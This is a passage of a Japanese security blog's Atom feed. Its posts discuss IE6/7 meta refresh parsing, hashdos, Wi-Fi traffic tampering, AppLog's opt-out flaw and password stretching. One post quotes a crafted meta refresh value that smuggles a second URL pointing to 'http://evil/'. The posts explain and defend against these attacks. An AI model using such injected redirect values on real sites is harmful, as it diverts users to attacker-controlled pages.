/><id>tag:bakera.jp,2008:/ebi/topic/4733</id><updated>2012-03-12T15:10:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2012/3/1">2012年3月1日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/4733">meta refreshの解釈の差異によって発生する問題</a></h2><p class="subinfo"><span class="updated">更新: 2012年3月12日15時10分頃</span></p><p>このお話は興味深いですね……「<a href="http://masatokinugawa.l0.cm/2012/03/googlemeta.html">Googleのmetaリダイレクトに存在した問題</a> <em class="domain-info">(masatokinugawa.l0.cm)</em>」。</p><p>meta refreshのcontent属性の中身を動的生成している場合、ここに外部から値を入れられるとき、リダイレクト先を変更できてしまう場合があるという話です。</p><div class="quote-and-cite"><blockquote><p>Internet Explorer 6/7では、以下のようなmetaタグの指定で、http://evil/へリダイレクトします。</p><p>&lt;meta http-equiv="refresh" content="0;url='http://good/'url='http://evil/'"&gt;</p></blockquote></div><p>ちなみにHTML5では、ご丁寧にmeta refreshのcontent属性のパース方法が決められていて、「<a href="http://www.w3.org/TR/html5/semantics.html#attr-meta-http-equiv-refresh">4.2.5.3 Pragma directives - Refresh state</a> <em class="domain-info">(www.w3.org)</em>」に細かく書かれています。</p><p>url=の後ろの値の読み取り部分だけを見ると、以下のような感じになります。</p><ul><li>17. 空白をスキップ</li><li>18. 単引用符もしくは二重引用符があれば、変数quoteにその文字をセット</li><li>19. content属性値の最後まで文字列を読み取る</li><li>20. quoteの値に何かセットされていて、それと同じ文字が文字列に含まれていれば、それ以降の文字をすべて切り落とす</li><li>21. URLの末尾からスペースを切り落とす</li><li>22. URLの中からタブ、LF,CRを削除する</li></ul><p>20. の処理でquote文字列の後ろはすべて切り落とされることになっているので、問題のケースでは http://good/ がURLとみなされるのが正しいです。IE6/7の処理はHTML5の仕様とは異なっています。</p><p>とはいえ、そういう残念な処理をするブラウザが存在するというのは事実なので、注意が必要になるということですね。</p><p>以下も似たような話です。</p><ul><li><a href="http://d.hatena.ne.jp/hasegawayosuke/20120301/p1">IE6/7の&lt;meta refresh&gt;では「;」で区切ってURLが複数指定できる問題</a> <em class="domain-info">(d.hatena.ne.jp)</em></li></ul><p>こちらも、IE6/7の解釈がHTML5仕様と異なっているという問題です。HTML5の仕様上は、;url= は単にURLの一部とみなされるのですが、IE6/7はそうは解釈しないということですね。</p><p>ちなみに、content属性の値はまずHTMLの属性として解釈されるので、数値文字参照や名前つき文字参照は、url=を解釈する前の時点で展開されています。つまり、URL中の単引用符を &amp;#39; や &amp;#x27; と書いてエスケープしようと思っても無駄です。</p><p>%27にエスケープするなら意味がありますが、URIの意味が変わってくる場合があります。' は<dfn class="glossary"><a href="../../glossary/RFC3986">RFC3986</a></dfn>で sub-delims に含まれている文字なので、生でURIの中に出現することがあり得ます。</p><p class="note">※2012-03-12追記: 上記部分部分、生「'」は普通出現しないと書いていましたが、ご指摘を受けて訂正しました。ありがとうございます。</p><p>そんなわけで、レガシーなブラウザを考慮するとmeta refreshの動的生成は注意が必要、という話ではあります。</p><p class="note">※しかし、そもそもmeta refreshなどというものを使う必要があるのでしょうか。時間指定のリダイレクトにはアクセシビリティ上の問題がありますし、「ページの自動読み込み」を無効にしたIEなどではmeta refreshは全く機能しないわけですから、必ず代替手段を用意しておく必要がありますし。</p><ul class="comment-link"><li><a href="../topic/4733/comment">「meta refreshの解釈の差異によって発生する問題」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9F%E3%83%B3%E3%82%B0">プログラミング</a> / <a href="../genre/HTML">HTML</a> / <a href="../genre/Internet%20Explorer">Internet Explorer</a></span></p></div></div></content></entry><entry><title>SVGをobject要素で活用する</title><link href="http://bakera.jp/ebi/topic/4704" /><id>tag:bakera.jp,2008:/ebi/topic/4704</id><updated>2012-02-24T23:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2012/1/31">2012年1月31日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/4704">SVGをobject要素で活用する</a></h2><p class="subinfo"><span class="updated">更新: 2012年2月24日23時20分頃</span></p><p>SVGというものはずっと昔からありました。かつてはブラウザ側の対応がいまいちで、プラグインを入れたりしないと表示できなかったりもしており、あまり使われていませんでした。しかしIE9がSVGに対応したことで、かなり使えるようになってきた印象があります。最近では仕事でもガチでSVGを使うことが増えてきています。</p><p>SVGの特長のひとつは、ベクターグラフィックなので伸び縮みに強いという点です。サイズ可変の領域にうまい具合に背景を敷きたいときには便利です。そして、最近はサイトのコンテンツ全体がサイズ可変ということも増えてきました。というか元々可変ではあると思うのですが、<a href="http://www.w3.org/TR/css3-mediaqueries/">Media Queries</a> <em class="domain-info">(www.w3.org)</em>を使った派手な変更を伴うパターンが増えてきて、画像のサイズを大幅に変更したいケースが増えてきています。</p><p>写真などはJPEG画像を拡大・縮小してもそれほど違和感はないのですが、細い線で構成された図や、エッジのはっきりしている幾何学的な図形などは、GIFやPNGを拡大・縮小すると線がぼやけてしまい、はっきりと劣化が分かってしまいます。特に、CIやVI (企業のロゴやシンボルマークなど) はぼやけてしまうとよろしくありません。そこで、このような画像もSVGにしたい、というニーズが出てきます。</p><p>しかし、SVGにはIE6～8が対応していないという問題があります。背景に使う分には、画像が見えなくてもたいして問題はありません (というか、画像が見えなくても問題ないように作っています)。しかし、画像無効環境でもないのにロゴが見えないとなると、これは厳しすぎます。</p><p class="note">※本当はIE9にしろと言いたいところですが、Windows XPにはIE9が入りませんし、社内にActiveXやVBScriptに依存したどうしようもないアプリがあってIE6が捨てられないというどうしようもない企業もあります。</p><p>そこで、ロゴとしてSVG画像を貼りつつ、SVGに対応していない環境ではPNG画像を表示させる、ということがやりたくなるわけです。</p><p>仕様的にはこれは簡単です。<dfn class="element"><a href="../../ref/html/element/object">object要素</a></dfn>を使ってSVG画像を貼り、その中で<dfn class="element"><a href="../../ref/html/element/img">img要素</a></dfn>を使って代替のPNG画像を指定すれば良いのです。この方法は14年前(!)のHTML4.0からあったやり方です (<a href="http://www.w3.org/TR/REC-html40-971218/struct/objects.html#h-13.3.1">HTML4.0 13.3.1 Rules for rendering objects</a> <em class="domain-info">(www.w3.org)</em>)。昔はobject要素への対応がおかしいブラウザもありましたが、最近のブラウザなら大丈夫なはず……。</p><p>実際にやってみると割と大丈夫……と思いきや、リンクがうまく行かないという問題が発覚。ロゴ画像はトップページへのリンクにしたいのですが、<dfn class="element"><a href="../../ref/html/element/a">a要素</a></dfn>の中に入れてもクリックできません。どうもobject要素の方が前面に出ていて、クリックイベントが後ろのアンカーに伝わらないようなのですね。<dfn class="element"><a href="../../ref/html/element/iframe">iframe</a></dfn>と同様、z-indexとかそういうレベルではない何かで前面扱いになるようです。</p><p>そこで出たアイデアが、「SVG画像自体にリンクを設置する」というもの。SVGにも<a href="http://www.w3.org/TR/SVG/linking.html#Links">a要素</a> <em class="domain-info">(www.w3.org)</em>があり、xlink:href属性でリンク先のURLを指定すると、HTMLの<dfn class="element"><a href="../../ref/html/element/a">a要素</a></dfn>と同じように働きます。で、試してみたら……なんと、object要素の中にリンク先のサイトが表示されて大爆笑。これは予想外でした。まあ、HTMLをobject要素で埋め込んだらそういう挙動になるでしょうから、分からないでもないのですが。</p><p>いちおう<a href="http://www.w3.org/TR/SVG/linking.html#AElementTargetAttribute">target属性</a> <em class="domain-info">(www.w3.org)</em>もあるのですが、そもそも、画像自体にリンクがついているのはあまり望ましくありません。同じ画像を使いつつ、リンクさせたくないという場合もあるからです。また、ロゴ画像のSVGはIliustratorからの書き出しで、XMLを手動で直すのは避けたいという事情もありました。</p><p>結局、<a href="http://www.w3.org/TR/SVG/interact.html#PointerEventsProperty">pointer-events</a> <em class="domain-info">(www.w3.org)</em>をnoneに設定すると背後のアンカーにイベントが渡るということで、object要素に style="pointer-events:none;" を設定して解決。また、ポインタが手の形にならない問題もあったりして、それはスクリプトで解決したり。</p><p>とまあ、いろいろ面白いことがあった訳ですが、何とか解決。SVGも、もう業務で使えるレベルになってきていると思います。</p><p class="note">※あわせて読みたい: <a href="http://subtech.g.hatena.ne.jp/mayuki/20120212/1329046476">SVGをobject要素で表示してリンクにする</a> <em class="domain-info">(subtech.g.hatena.ne.jp)</em></p><ul class="comment-link"><li><a href="../topic/4704/comment">「SVGをobject要素で活用する」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/HTML">HTML</a> / <a href="../genre/SVG">SVG</a></span></p></div></div></content></entry><entry><title>HashTableのアルゴリズムを突いたDoS攻撃</title><link href="http://bakera.jp/ebi/topic/4680" /><id>tag:bakera.jp,2008:/ebi/topic/4680</id><updated>2012-01-20T01:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2012/1/5">2012年1月5日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/4680">HashTableのアルゴリズムを突いたDoS攻撃</a></h2><p class="subinfo"><span class="updated">更新: 2012年1月20日1時0分頃</span></p><p>これは興味深いですね……「<a href="http://blog.tokumaru.org/2011/12/webdoshashdos.html">Webアプリケーションに対する広範なDoS攻撃手法(hashdos)の影響と対策</a> <em class="domain-info">(blog.tokumaru.org)</em>」。</p><div class="quote-and-cite"><blockquote cite="http://blog.tokumaru.org/2011/12/webdoshashdos.html"><p>PHPなど多くの言語では、文字列をキーとする配列（連想配列、ハッシュ）が用意されており、HTTPリクエストのパラメータも連想配列の形で提供されます。PHPの場合、$_GET、$_POSTなどです。</p><p>連想配列の実装には、高速な検索が要求されるためハッシュテーブルが用いられます。ハッシュテーブルは、文字列を整数値（ハッシュ値）に変換するハッシュ関数を用いて、平均的には一定時間に検索・挿入・削除が行えるデータ構造です。しかし、ハッシュ値が一致する（衝突する）キー文字列については、通常ハッシュテーブルは順次的な探索となり、検索・挿入などが遅くなります。</p></blockquote><p class="cite">以上、<a href="http://blog.tokumaru.org/2011/12/webdoshashdos.html">Webアプリケーションに対する広範なDoS攻撃手法(hashdos)の影響と対策</a> より</p></div><p>ハッシュテーブルの実装では、まず配列を用意しておき、格納したいキーのハッシュ値を取って、値に対応するインデクスに値を格納する処理をします。こうすることで、キーを検索することなく、ハッシュ値を求めるだけですぐに値を取ってくる事ができるようになっています。</p><p>しかしながら、複数のキーのハッシュ値が衝突するようなケースもあり得ます。そのような場合は、仕方ないので同じインデクスに複数のキーをぶら下げておき、その中からキーを検索して値を取り出すことになります。つまり、キーのハッシュ値が衝突するとハッシュテーブルは遅くなりますし、CPUを使うことになります。</p><p>この攻撃のポイントの一つは、データを格納する時点で問題が起きるということです。通常、ハッシュテーブルでは同一のキーを複数持つことができず、既に存在するキーの値を追加しようとすると、既存の値を上書きするようになっています。そのため、データを挿入する際、そのキーが既に存在するかどうかをチェックすることになります。</p><p>ハッシュ値が衝突するキーがたくさんあればあるほど、検索は遅くなります。追加しようとするたびに検索が走り、その検索の負荷は追加されたキー数に比例しますので、負荷は衝突するキー数に比例するのではなく、衝突するキー数の二乗に比例します。衝突するキーを増やすと、とても効率の良いDoSができるというわけです。</p><p>これは言語のハッシュテーブルの実装の問題ですので、影響範囲はWebアプリケーションに限定されません。にもかかわらずWebについて言われているのは、値が自動的にハッシュテーブルに格納されるためです。</p><p>Webアクセス時、ほとんどの環境では、<dfn class="glossary"><a href="../../glossary/HTTP%E8%A6%81%E6%B1%82%E3%83%98%E3%83%83%E3%83%80">HTTP要求ヘッダ</a></dfn>の内容がハッシュテーブルに格納されます。衝突するような名前のフィールドを大量に入れておくと、その値をキーとしたハッシュテーブルが自動的に作られて攻撃が成立します。先に述べたように、ハッシュテーブルにデータを格納する時点で問題が発生しますので、アプリケーションで値を使っていなくても影響を受けてしまいます。</p><p class="note">※2012-01-19 追記: <dfn class="glossary"><a href="../../glossary/HTTP%E5%BF%9C%E7%AD%94%E3%83%98%E3%83%83%E3%83%80">HTTP応答ヘッダ</a></dfn>と書いていましたが、<dfn class="glossary"><a href="../../glossary/HTTP%E8%A6%81%E6%B1%82%E3%83%98%E3%83%83%E3%83%80">HTTP要求ヘッダ</a></dfn>の誤りでした。</p><p class="note">※2012-01-20 追記: <dfn class="glossary"><a href="../../glossary/HTTP%E8%A6%81%E6%B1%82%E3%83%98%E3%83%83%E3%83%80">HTTP要求ヘッダ</a></dfn>の列挙だけではApacheの通常の制限で100件程度しか送れないため、POSTデータやクエリ文字列を使う、Cookieを利用するなどが必要になるようです (参考: <a href="http://blog.tokumaru.org/2012/01/cookie-hashdos-attack-defense.html">Cookieによるhashdos攻撃と対策 </a> <em class="domain-info">(blog.tokumaru.org)</em>)。</p><p>根本的な対策としては、ハッシュテーブルにデータを格納する際のハッシュ値を予測困難にすることが考えられます。たとえば、キーの値をそのままハッシュアルゴリズムに通すのではなく、ランダムな値を連結してからハッシュ値を取るようにします。こうすると、ランダムな値が知られない限り、攻撃者は衝突するキーの組み合わせを用意することができません。</p><p>言語側でパッチが続々と出ていますので、適用すれば解決します。パッチが適用できない場合は、徳丸さんも書かれているように、リクエストを制限することで問題を緩和することができます。</p><p>ところで余談ですが、今回の問題、古いRuby1.8は影響を受けるがRuby1.9はそもそも影響を受けない、という話を耳にしました。少し調べたところ、Ruby1.9でハッシュテーブルの実装が変わって追加順序を保持するようになったという話を発見したので、その際に内部実装が変わって影響を受けなくなったのか……と一瞬思いました。</p><p>しかし、ハズレでした。なかださんが教えてくださったところによると、</p><div class="quote-and-cite"><blockquote cite="https://twitter.com/#!/n0kada/status/154775878142935040"><p>その二つは無関係。順序はforeachの高速化のためにdouble linked listにした副作用。衝突耐性は今回の1.8.7同様random seedの追加によるもの(と多分MurMur hash化による逆演算の困難化も少々)。</p></blockquote><p class="cite">以上、<a href="https://twitter.com/#!/n0kada/status/154775878142935040">https://twitter.com/#!/n0kada/status/154775878142935040</a> より</p></div><p>……ということだそうで、意図的に対策しているとのことです (ありがとうございます)。</p><ul class="comment-link"><li><a href="../topic/4680/comment">「HashTableのアルゴリズムを突いたDoS攻撃」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Ruby">Ruby</a></span></p></div></div></content></entry><entry><title>公衆無線LANによる通信傍受、改竄のリスク</title><link href="http://bakera.jp/ebi/topic/4652" /><id>tag:bakera.jp,2008:/ebi/topic/4652</id><updated>2011-12-13T23:35:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/12/5">2011年12月5日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/4652">公衆無線LANによる通信傍受、改竄のリスク</a></h2><p class="subinfo"><span class="updated">更新: 2011年12月13日23時35分頃</span></p><p>ものすごい話が出ていますよ……「<a href="http://togetter.com/li/223293">公衆無線LANのConnectFree、利用するとTwitter IDとFacebookをMACアドレスと紐づけられ、いつどこでどのサイトを閲覧したか収集されるらしい</a> <em class="domain-info">(togetter.com)</em>」。</p><p>以前から言われていた攻撃手法として、以下のようなものがありました。</p><ul><li>悪意ある攻撃者が、無線LANのアクセスポイントを公開する</li><li>SSIDを公衆無線LANサービスと思われるようなものにしておく</li><li>誰かがそのアクセスポイントにアクセスすると、攻撃者は通信内容を自由に傍受・改竄して攻撃できる</li></ul><p>そして「野良無線LAN危ないから気をつけて」「HTTPSを使おう」という話になるわけですが、今回は、こういう攻撃が実際に、しかも公衆無線LAN提供会社によって組織的に行われていたという話ですね。おそらく当人には「攻撃」という意識はないと思いますが、内容を見ると立派に傍受と改竄を成功させていますし、脅威にもなっています。これは攻撃と言われても仕方ないでしょう。</p><p>改竄の内容は以下のようなものだそうで。</p><ul><li>Webページの上部にツールバーのようなものが出現するようにスクリプト等を埋め込み</li><li>Google Analyticsのタグ埋め込み</li><li>Amazonのアフィリエイトが埋め込まれていたら、そのアフィリエイトIDを改竄 (HTMLを直接改竄しているわけではなく、改竄するようなスクリプトを埋め込み)</li></ul><p>どれも問題ですが、あえて最も悪質なものを挙げるとすれば、アフィリエイト報酬の奪取でしょう。ConnectFreeを使ってこのサイトにアクセスした人がいて、その人がアフィリエイトリンクを経由してAmazonで何かを買っていた場合、私に支払われるはずの報酬がConnectFreeの運営会社に奪われていたことになります。実際に金銭被害が発生している可能性がありますし、電子計算機使用詐欺罪にあたる可能性も考えられるのではないでしょうか。</p><p class="note">※実際問題、私が被害を受けている可能性もあるのですが、どうしたものでしょうかね……。</p><p class="note">※2011-12-13追記: 以下の部分は私の誤解によるもののようで、撤回します。</p><p>それとは別に、スクリプトには利用者のMACアドレス、FacebookアカウントのID、TwitterのIDなどが埋め込まれていたという話があります。これはサイト側から読めるようになっていたので、ConnectFree経由でサイトにアクセスすると、サイト側にTwitterIDなどを読み取られてしまう危険があるという。</p><p>記録するだけならスクリプトに入れる必要がないはずなので、入っていた理由が良く分かりませんが、はっきり言って脆弱性でしょうね。全体的に問題がありすぎるので、届け出て修正してもらうとかそういう話ではありませんが。</p><p class="note">※2011-12-13追記: と、ここまでの部分は私の誤解だったようです。高木さんからはてなブックマークでコメントいただきました (ご指摘ありがとうございます): 「<a href="http://b.hatena.ne.jp/HiromitsuTakagi/20111213#bookmark-71651477"><q cite="http://b.hatena.ne.jp/HiromitsuTakagi/20111213#bookmark-71651477">むむ、ここは事実誤認 →「スクリプトには利用者の…FacebookアカウントのID、TwitterのIDなどが埋め込まれていたという話…」← 正しくは、TwitterやFacebookサイトを訪れたときにIDを取得して送信するようになっていたもの。</q></a>」</p><p>まあ、そもそも怪しげな無線LANアクセスポイントを利用すると危険だという話があるわけですが、こういう話を見ると、素性がある程度しっかりしていても安心できない感じがします。</p><p>対策としては、HTTPSを使えばOKではあるのですが……。サイト側はフォームに限らず、あらゆるコンテンツをHTTPSでアクセスできるようにした方が良いのかも知れないなぁ、などと思ったりする次第です。</p><ul class="comment-link"><li><a href="../topic/4652/comment">「公衆無線LANによる通信傍受、改竄のリスク」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>AppLogサービス終了</title><link href="http://bakera.jp/ebi/topic/4608" /><id>tag:bakera.jp,2008:/ebi/topic/4608</id><updated>2011-10-31T01:05:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/10/26">2011年10月26日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/4608">AppLogサービス終了</a></h2><p class="subinfo"><span class="updated">更新: 2011年10月31日1時5分頃</span></p><p>いろいろと話題になっていたAppLog、「10月26日に次の一手を発表」と予告されていて、いろいろな期待や予測がなされていましたが……結局、発表されたのはこれでした。</p><ul><li><a href="http://milog.co.jp/news/2011/10/applogsdk-4.html">AppLogSDKサービス終了のお知らせ</a> <em class="domain-info">(milog.co.jp)</em></li></ul><p>サービス終了だそうで。サービス終了の発表を「次の一手」として予告するのも変ですから、本来はもっと別な発表を予定していたのでしょう。しかし、その予定が流れてしまったのだと思います。おそらくは、パートナーとの契約を白紙に戻されてしまったのでしょう。</p><p>いちおう、おわびの言葉が出ていますね。</p><div class="quote-and-cite"><blockquote cite="http://milog.co.jp/news/2011/10/applogsdk-4.html"><p>アプリケーションの利用者様から取得させて頂いた情報の扱いに関しては、第三者委員会をはじめ外部有識者の指導に従い適切に管理、破棄等の手順を踏ませて頂きますと同時に、情報取得を一切停止することを維持するために必要な運営管理を継続的に行って参ります。</p><p>また、本件で明らかになった問題点、課題点の改善を、第三者委員会、及び外部有識者と誠実に取組み、再発防止に真摯に取り組んで参ります。</p><p>このたびはご迷惑おかけして誠に申し訳ありませんでした。</p></blockquote><p class="cite">以上、<a href="http://milog.co.jp/news/2011/10/applogsdk-4.html">AppLogSDKサービス終了のお知らせ</a> より</p></div><p>「情報取得を一切停止することを維持するために必要な運営管理」というのがちょっと分かりにくいかもしれません。</p><p>AppLogは、オプトアウトの情報を端末側ではなく、サーバ側で保持する仕組みになっています。「<a href="http://typex2.wordpress.com/2011/10/10/applog%E3%81%AE%E3%82%AA%E3%83%97%E3%83%88%E3%82%A2%E3%82%A6%E3%83%88%E3%81%AE%E4%BB%95%E6%A7%98%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6/">AppLogのオプトアウトの仕様の脆弱性</a> <em class="domain-info">(typex2.wordpress.com)</em>」では、以下のように報告されています。</p><div class="quote-and-cite"><blockquote cite="http://typex2.wordpress.com/2011/10/10/applog%E3%81%AE%E3%82%AA%E3%83%97%E3%83%88%E3%82%A2%E3%82%A6%E3%83%88%E3%81%AE%E4%BB%95%E6%A7%98%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6/"><p>AppLogSDKが組み込まれたアプリはログ収集の許可状態を確認するためにサーバに以下のURLをGETする。</p><p>https://api.applogsdk.com//v2/device</p><p class="snip"><em>(～中略～)</em></p><p>AppLogSDKが組み込まれたアプリが、ユーザにログ収集の同意確認画面を表示されるのは、”notification”:{“enable”:true} の場合であるため、第三者に不正にオプトアウトの状態を変更されると、ユーザにログ収集の同意確認画面を表示することなく、ログ収集を行うことが可能である。</p></blockquote><p class="cite">以上、<a href="http://typex2.wordpress.com/2011/10/10/applog%E3%81%AE%E3%82%AA%E3%83%97%E3%83%88%E3%82%A2%E3%82%A6%E3%83%88%E3%81%AE%E4%BB%95%E6%A7%98%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6/">AppLogのオプトアウトの仕様の脆弱性</a> より</p></div><p>AppLogの入った端末は、まずサーバと通信し、設定情報を得ようとします。</p><p>サービスが終了して、このサーバを放棄したとしましょう。脆弱性が放置されたり、ドメインの期限が切れたりすれば、このサーバを誰かに乗っ取られる可能性があります。するとどうなるか、これは言うまでもないことでしょう。</p><p>ですから、AppLogの入った端末が一台もなくなるまで、ドメインやサーバの維持管理を続けならければならないのです。「情報取得を一切停止することを維持するために必要な運営管理」というのは、このようなことを言っているのだと思います。</p><p class="note">※2011-10-31追記: ドメインは維持したままサーバは止める、という選択肢もあるのかもしれませんが、サーバを止めたときに端末側がどういう挙動をするのかが良く分からないので、何とも言えません。基本的にはサーバ側からオプトアウトの指令を送ってやる形が望ましいのだろうと思います。</p><p>しかし、何の利益も生まないサーバを維持し続ける羽目になる、というのは厳しいですね。こうなってしまったのは、サーバ側に設定を持つという設計が原因です。設計時に「サービス終了したときにサーバを放棄できるか」というところまで明確に考えるのも難しいとは思うのですが、やはり全体的に安易な設計だったという印象は否めないところです。</p><p>ところで、AppLogのおわびには続きがあります。</p><div class="quote-and-cite"><blockquote cite="http://milog.co.jp/news/2011/10/applogsdk-4.html"><p>つきましては、今後のサービス開発の参考にさせて頂くべく、アンドロイドユーザーの皆様のお力をお借りさせて頂きたいと思います。下記のフォームから、【「３分で終わる」アンドロイド利用状況調査】にご協力を是非とも宜しくお願いいたします。</p></blockquote><p class="cite">以上、<a href="http://milog.co.jp/news/2011/10/applogsdk-4.html">AppLogSDKサービス終了のお知らせ</a> より</p></div><p>「つきましては」の意味が全く分かりませんでした。おわびの内容と、このアンケートとは何の関係があるのでしょうか。そもそも、こういう意味不明な情報収集をやってしまう感覚が問題にされたのだと思うわけで、これでは「おわび」が台無しだと思うのですが……。</p><ul class="comment-link"><li><a href="../topic/4608/comment">「AppLogサービス終了」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%97%E3%83%A9%E3%82%A4%E3%83%90%E3%82%B7%E3%83%BC">プライバシー</a> / <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a> / <a href="../genre/AppLog">AppLog</a> / <a href="../genre/%E3%83%9F%E3%83%AD%E3%82%B0">ミログ</a></span></p></div></div></content></entry><entry><title>続・徳丸本のあれこれ ストレッチング処理の変更</title><link href="http://bakera.jp/ebi/topic/4457" /><id>tag:bakera.jp,2008:/ebi/topic/4457</id><updated>2011-07-10T09:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2011/6/28">2011年6月28日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/4457">続・徳丸本のあれこれ ストレッチング処理の変更</a></h2><p class="subinfo"><span class="updated">更新: 2011年7月10日9時20分頃</span></p><p><a href="../topic/4441">徳丸本のあれこれを実践してみて気付いたこと</a>の続きです。</p><p>前回、ストレッチングの回数をどうするのかが難しいと書きました。負荷を心配しつつ1000回で実装してみたのですが、実際に動かしてみると処理が一瞬で終わってしまい、速すぎて心細く感じるほどでした。</p><p>アプリケーションの機能は一通り実装し終わり、テスト運用を始めたのですが、しばらく運用してみてもログインが遅いとか、それに伴って負荷が高くなるといったことは起きませんでした。</p><p>というわけで、もう少し遅くしてストレッチパワーをためた方が良いのではないかと考え、調整することにしました。</p><div class="section"><h3 id="section3">ハッシュアルゴリズムの変更</h3><p>まず、ハッシュアルゴリズムをSHA512に変更しました。<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4797361190&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">徳丸本</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4797361190" alt="" width="1" height="1" /></span>ではSHA256が使われていますが、SHA512の方が遅く、生成されるハッシュ値も長くなります。遅いのは普通はデメリットですが、今回はメリットになります。</p><p class="note">※2011-07-10追記: 手元で実測した結果ではSHA512の方が少し遅かったので「遅い」と判断していましたが、<a href="http://twitter.com/haruyama/status/89697809024036865">春山さんからコメントをいただきました</a> <em class="domain-info">(twitter.com)</em> (ありがとうございます)。64ビットCPUではSHA512の方が速いと言われているそうです。実装に依存する面もあるので、一概にどちらが遅いとは言えないようです。</p><p>ハッシュ値の長さは、16進表記で128文字。少し長い感じもしますが、varchar(255)のカラムにすんなり格納できますから問題ありません。</p><p class="note">※データベースのサイズを節約したい場合は、Base64にしたり、バイナリで保存することにしても良いと思います。徳丸本のPHPのコードではhexdigestの形になっていて、それで特に問題なかったのでそのまま採用しました。</p><p>Rubyには標準で<a href="http://www.ruby-lang.org/ja/man/html/Digest_SHA512.html">Digest::SHA512</a> <em class="domain-info">(www.ruby-lang.org)</em>がありますので、Digest::SHA512#hexdigestを呼ぶだけでOKです。ついでに、設定ファイルでDigestの種類を変更できるようにしておきました。</p></div><div class="section"><h3 id="section4">ストレッチ回数の調整</h3><p>ハッシュアルゴリズムをSHA512に変更しても、速度はそれほど大きくは変わりませんでしたので、処理の回数も調整することにしました。</p><p>解析されにくくするためには、できるだけ遅くしたいところです。しかし、遅すぎるとログインのたびに利用者が待たされることになります。どのくらいを遅すぎると判断するのかは難しいところですが、今回は、0.1秒以内に処理できれば良いことにしました。</p><p>手元の環境でベンチマークを実行してみました。Rubyには<a href="http://www.ruby-lang.org/ja/man/html/benchmark.html">Benchmark</a> <em class="domain-info">(www.ruby-lang.org)</em>というクラスがありますので、rails consoleから以下のようなコードを実行しました。</p><div class="sample"><p>Benchmark.measure { 1000.times{ User.password_digest('user_id', 'dummy_passphrase') } }</p></div><p>1回だけの測定では一瞬で終わってしまって誤差が大きいので、1000.timesで1000回実行するようにしています。ストレッチ回数の設定を変更しながら試していったところ、ストレッチ5000回が約0.07秒でした。処理速度は環境に依存すると思われますが、まあこのくらいで良いでしょう。</p></div><p>というわけで、ハッシュアルゴリズムをSHA512、ストレッチ回数を5000回に設定しました。本番反映してしばらく様子を見ましたが、特に問題も出ていないようです。もちろん、アルゴリズムや回数を変更すると既存のユーザーはログインできなくなりますので、パスワードの再設定は必要になりましたが。</p><p>なお、これはあくまで私が今回実装したシステムでの話です。今回開発しているアプリケーションはCMSで、ログインするのはサイト管理者、編集者、承認者だけ、その頻度も高くありません。そのため、ログイン処理の負荷が問題になることはあまり考えられないでしょう。一般の利用者がユーザー登録するようなシステムの場合、一度に多数のユーザーが頻繁にログインする可能性がありますので、もう少し慎重に検討する必要があるかもしれません。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/4457/comment">「続・徳丸本のあれこれ ストレッチング処理の変更」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9F%E3%83%B3%E3%82%B0">プログラミング</a> / <a href="../genre/Ruby">Ruby</a> / <a href="../genre/%E5%BE%B3%E4%B8%B8%E6%9C%AC">徳丸本</a> / <a 